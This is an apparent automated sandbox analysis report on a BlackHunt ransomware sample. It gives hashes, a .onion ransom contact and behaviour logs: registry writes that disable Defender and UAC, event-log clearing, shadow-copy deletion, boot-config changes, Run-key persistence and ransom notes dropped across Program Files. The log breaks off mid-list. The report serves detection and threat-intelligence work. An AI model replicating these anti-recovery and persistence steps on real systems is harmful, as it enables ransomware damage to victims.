Analysis
-
max time kernel
144s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
18-01-2024 23:47
Static task
static1
Behavioral task
behavioral1
Sample
74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe
Resource
win10v2004-20231222-en
General
-
Target
74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe
-
Size
707KB
-
MD5
b82cac919f05596869d5a32c6f47c18e
-
SHA1
ae6ddf54a7e42b27036dd9fec6fa9641bbf0f604
-
SHA256
74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7
-
SHA512
288847950e61a25723d54fadb82c59f34144f3b90d3439561577a035ba9ba6e080642b18c4070ad240787f6a30dd656d9bc6cf14fa64a40a4636d8a900959a31
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1j82vnh:6uaTmkZJ+naie5OTamgEoKxLWiIh
Malware Config
Extracted
F:\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 6364 fsutil.exe 9352 fsutil.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 2752 wevtutil.exe 11780 wevtutil.exe 3712 wevtutil.exe 3676 wevtutil.exe 12036 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 9336 bcdedit.exe 6632 bcdedit.exe 408 bcdedit.exe 10592 bcdedit.exe -
Renames multiple (3367) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 10312 wbadmin.exe 7872 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\G: 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened (read-only) \??\Z: 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened (read-only) \??\N: 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened (read-only) \??\M: 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened (read-only) \??\E: 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened (read-only) \??\I: 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened (read-only) \??\O: 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened (read-only) \??\H: 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened (read-only) \??\L: 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\B: 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\P: 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened (read-only) \??\S: 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened (read-only) \??\J: 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened (read-only) \??\R: 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened (read-only) \??\X: 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened (read-only) \??\U: 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened (read-only) \??\K: 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened (read-only) \??\V: 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened (read-only) \??\Q: 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened (read-only) \??\A: 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\W: 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened (read-only) \??\T: 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened (read-only) \??\Y: 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 7 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\sl-sl\#BlackHunt_Private.key 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\root\#BlackHunt_ReadMe.txt 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened for modification C:\Program Files\7-Zip\Lang\en.ttt 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\relaxngom.md 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files\VideoLAN\VLC\locale\eu\#BlackHunt_Private.key 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files\VideoLAN\VLC\plugins\text_renderer\#BlackHunt_ReadMe.hta 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\EPDF_Full.aapp 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ar-ae\#BlackHunt_ReadMe.hta 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\es-es\#BlackHunt_ReadMe.hta 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files\Java\jdk-1.8\include\win32\#BlackHunt_ReadMe.hta 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ru-ru\#BlackHunt_ReadMe.txt 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\es-es\#BlackHunt_ReadMe.txt 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sv-se\#BlackHunt_ReadMe.hta 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\uk-ua\#BlackHunt_Private.key 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\fr-ma\ui-strings.js 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files\Java\jdk-1.8\jre\bin\dtplugin\#BlackHunt_ReadMe.txt 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files\VideoLAN\VLC\locale\gu\#BlackHunt_ReadMe.txt 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\zh-tw\#BlackHunt_Private.key 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\nb-no\#BlackHunt_ReadMe.hta 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\tr-tr\#BlackHunt_ReadMe.hta 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\themes\dark\#BlackHunt_Private.key 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened for modification C:\Program Files\GrantRedo.ppsx 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files\VideoLAN\VLC\locale\si\#BlackHunt_Private.key 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files\VideoLAN\VLC\plugins\video_chroma\#BlackHunt_Private.key 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\OptimizePDF_R_RHP.aapp 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\de-de\#BlackHunt_ReadMe.hta 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\cs-cz\#BlackHunt_ReadMe.txt 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ro-ro\#BlackHunt_ReadMe.hta 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\#BlackHunt_ReadMe.hta 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sl-si\#BlackHunt_ReadMe.hta 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\sl-sl\#BlackHunt_Private.key 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\es-es\#BlackHunt_Private.key 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\s_checkbox_unselected_18.svg 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\it-it\#BlackHunt_Private.key 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\versions\#BlackHunt_ReadMe.txt 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy.jar 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\#BlackHunt_Private.key 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\cs-cz\#BlackHunt_ReadMe.txt 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\css\#BlackHunt_ReadMe.txt 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\en-gb\#BlackHunt_ReadMe.hta 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\it-it\ui-strings.js 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened for modification C:\Program Files\7-Zip\Lang\ug.txt 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files\dotnet\host\#BlackHunt_Private.key 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\#BlackHunt_ReadMe.txt 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sk-sk\#BlackHunt_ReadMe.txt 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\tr-tr\#BlackHunt_ReadMe.txt 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\es-es\#BlackHunt_Private.key 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\bg_patterns_header.png 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\sat_logo_2x.png 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\de-de\ui-strings.js 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\#BlackHunt_ReadMe.hta 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\spectrum_spinner.svg 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ro-ro\#BlackHunt_Private.key 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\nl-nl\#BlackHunt_ReadMe.hta 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ja-jp\#BlackHunt_Private.key 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\#BlackHunt_ReadMe.hta 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ca-es\#BlackHunt_ReadMe.txt 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ro-ro\#BlackHunt_ReadMe.txt 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\sl-si\#BlackHunt_Private.key 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened for modification C:\Program Files\7-Zip\Lang\pt-br.txt 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\security\#BlackHunt_Private.key 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files\VideoLAN\VLC\locale\kn\#BlackHunt_ReadMe.txt 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\illustrations_retina.png 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\hr-hr\#BlackHunt_ReadMe.txt 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 6452 6536 WerFault.exe 296 -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 7836 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 6376 vssadmin.exe 4688 vssadmin.exe 6328 vssadmin.exe 10072 vssadmin.exe 4932 vssadmin.exe 9940 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 11192 taskkill.exe -
Modifies registry class 9 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 9656 PING.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1936 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 1936 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe Token: SeRestorePrivilege 1936 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe Token: SeBackupPrivilege 1936 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe Token: SeTakeOwnershipPrivilege 1936 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe Token: SeAuditPrivilege 1936 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe Token: SeSecurityPrivilege 1936 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe Token: SeIncBasePriorityPrivilege 1936 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe Token: SeBackupPrivilege 9988 vssvc.exe Token: SeRestorePrivilege 9988 vssvc.exe Token: SeAuditPrivilege 9988 vssvc.exe Token: SeBackupPrivilege 11152 wbengine.exe Token: SeRestorePrivilege 11152 wbengine.exe Token: SeSecurityPrivilege 11152 wbengine.exe Token: SeSecurityPrivilege 2752 wevtutil.exe Token: SeBackupPrivilege 2752 wevtutil.exe Token: SeSecurityPrivilege 11780 wevtutil.exe Token: SeBackupPrivilege 11780 wevtutil.exe Token: SeSecurityPrivilege 3676 wevtutil.exe Token: SeBackupPrivilege 3676 wevtutil.exe Token: SeSecurityPrivilege 3712 wevtutil.exe Token: SeBackupPrivilege 3712 wevtutil.exe Token: SeSecurityPrivilege 12036 wevtutil.exe Token: SeBackupPrivilege 12036 wevtutil.exe Token: SeDebugPrivilege 11192 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1936 wrote to memory of 5828 1936 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 92 PID 1936 wrote to memory of 5828 1936 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 92 PID 1936 wrote to memory of 5760 1936 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 93 PID 1936 wrote to memory of 5760 1936 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 93 PID 1936 wrote to memory of 2036 1936 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 95 PID 1936 wrote to memory of 2036 1936 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 95 PID 1936 wrote to memory of 4788 1936 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 98 PID 1936 wrote to memory of 4788 1936 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 98 PID 5828 wrote to memory of 828 5828 cmd.exe 99 PID 5828 wrote to memory of 828 5828 cmd.exe 99 PID 1936 wrote to memory of 5460 1936 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 100 PID 1936 wrote to memory of 5460 1936 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 100 PID 1936 wrote to memory of 4696 1936 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 102 PID 1936 wrote to memory of 4696 1936 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 102 PID 1936 wrote to memory of 5236 1936 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 106 PID 1936 wrote to memory of 5236 1936 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 106 PID 2036 wrote to memory of 1476 2036 cmd.exe 104 PID 2036 wrote to memory of 1476 2036 cmd.exe 104 PID 1936 wrote to memory of 2220 1936 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 107 PID 1936 wrote to memory of 2220 1936 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 107 PID 1936 wrote to memory of 1032 1936 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 113 PID 1936 wrote to memory of 1032 1936 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 113 PID 1936 wrote to memory of 2640 1936 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 109 PID 1936 wrote to memory of 2640 1936 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 109 PID 4788 wrote to memory of 5208 4788 cmd.exe 111 PID 4788 wrote to memory of 5208 4788 cmd.exe 111 PID 1936 wrote to memory of 3608 1936 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 117 PID 1936 wrote to memory of 3608 1936 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 117 PID 5760 wrote to memory of 4748 5760 cmd.exe 115 PID 5760 wrote to memory of 4748 5760 cmd.exe 115 PID 1936 wrote to memory of 3888 1936 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 118 PID 1936 wrote to memory of 3888 1936 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 118 PID 4696 wrote to memory of 4208 4696 cmd.exe 116 PID 4696 wrote to memory of 4208 4696 cmd.exe 116 PID 5236 wrote to memory of 4016 5236 cmd.exe 119 PID 5236 wrote to memory of 4016 5236 cmd.exe 119 PID 1936 wrote to memory of 6120 1936 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 121 PID 1936 wrote to memory of 6120 1936 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 121 PID 1032 wrote to memory of 212 1032 cmd.exe 124 PID 1032 wrote to memory of 212 1032 cmd.exe 124 PID 1936 wrote to memory of 5324 1936 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 123 PID 1936 wrote to memory of 5324 1936 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 123 PID 5460 wrote to memory of 6028 5460 cmd.exe 126 PID 5460 wrote to memory of 6028 5460 cmd.exe 126 PID 